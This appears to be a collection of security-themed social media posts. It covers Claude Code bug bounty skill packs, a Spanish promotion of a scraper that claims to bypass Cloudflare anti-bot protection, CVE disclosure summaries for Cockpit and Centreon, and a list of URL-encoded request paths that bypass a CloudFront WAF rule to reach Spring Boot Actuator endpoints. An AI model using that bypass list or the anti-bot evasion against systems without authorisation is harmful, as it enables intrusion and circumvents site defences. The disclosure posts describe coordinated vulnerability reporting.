coradi

Claude-BugHunter: 71 AI-Powered Skills for Bug Bounty Hunting and External Red Team Operations 💀🔥 🤖 Turn Claude into a Bug Hunting Assistant Claude-BugHunter equips Claude Code with bug bounty methodologies, recon workflows, vulnerability hunting patterns, reporting guidance, and external red team tradecraft. 🔗 https://t.co/89R7Cx20oz #BugBounty #CyberSecurity #ClaudeCode #AppSec #RedTeam #AI #OpenSource

El web scraping acaba de cambiar de nivel Scrapling evita los bloqueos de Cloudflare, es 774 veces más rápido que BeautifulSoup y no necesita configuración de proxies 52.2k estrellas en GitHub No es otro scraper más Es un framework adaptativo que aprende la estructura de cada web y se ajusta automáticamente cuando cambia Sin mantenimiento manual. Sin que te bloqueen. ✅ Bypassa Cloudflare y los anti-bots más agresivos ✅ 774x más rápido que BeautifulSoup en benchmarks reales ✅ Sin necesidad de proxies ni configuración especial ✅ Se adapta automáticamente cuando cambia la estructura de la web ✅ Compatible con agentes de IA como servidor MCP ✅ Soporte para JavaScript, iframes y contenido dinámico ✅ Modo stealth para webs con detección avanzada ✅ 46 releases. Actualizado la semana pasada. ✅ Licencia BSD-3 Lo que antes tardabas días en montar y mantener ahora son minutos 52.2k estrellas. 5k forks. BSD-3. repo aquí 👇

In our latest analysis, we dive into CVE-2026-4802, a high-severity vulnerability discovered by our team in Cockpit that allows a remote attacker to achieve arbitrary command execution on the host by exploiting unsanitized user-controlled parameters within crafted links in the system logs user interface (UI). Read the full analysis on our blog: https://t.co/GmlNKUPCdI

Claude Bug Bounty Hunter - https://t.co/zCfJPWRXdG Claude Code skill that turns Claude into your AI bug bounty co-pilot. Point it at any target and Claude maps the attack surface, runs your scanners, validates findings, and writes the HackerOne or Bugcrowd report — all from a single conversation. #bugbounty #bugbountytips #ethicalhacking #claudecode #cybersecurity #hacking #infosec #pentest #hackerone #bugcrowd #opensource

Claude Bug Bounty Hunter - https://t.co/MYM35cC7Ss Claude Code skill that turns Claude into your AI bug bounty co-pilot. Point it at any target and Claude maps the attack surface, runs your scanners, validates findings, and writes the HackerOne or Bugcrowd report — all from a single conversation. #bugbounty #bugbountytips #ethicalhacking #claudecode #cybersecurity #hacking #infosec #pentest #hackerone #bugcrowd #opensource

Bypass CloudFront WAF rule blocking access to Spring Boot # All bypasses return real Actuator data: GET /%61ctuator/health → HTTP 200 (5122B) ← 'a' encoded GET /a%63tuator/health → HTTP 200 (5123B) ← 'c' encoded GET /ac%74uator/health → HTTP 200 (5122B) ← 't' encoded GET /act%75ator/health → HTTP 200 (5123B) ← 'u' encoded GET /actu%61tor/health → HTTP 200 (5123B) ← 'a' encoded GET /actua%74or/health → HTTP 200 (5123B) ← 't' encoded GET /actuat%6For/health → HTTP 200 (5123B) ← 'o' encoded GET /actuato%72/health → HTTP 200 (5123B) ← 'r' encoded GET /a%63%74uator/health → HTTP 200 (5123B) ← double encoded GET /%61ctua%74or/health → HTTP 200 (5123B) ← double encoded GET /%61%63%74%75%61%74%6F%72/health → HTTP 200 (5122B) ← fully encoded

Yesterday our team disclosed an RCE (CVE-2026-2749) in Centreon, along with a few other vulnerabilities. Full details are available in our blog post. The issues were responsibly reported to Centreon, which acknowledged them and released fixes for all affected versions. This resulted in three CVEs: CVE-2026-2749, CVE-2026-2751, and CVE-2026-2750. The RCE has a CVSS score of 9.9. Link: https://t.co/PGjl4vlc55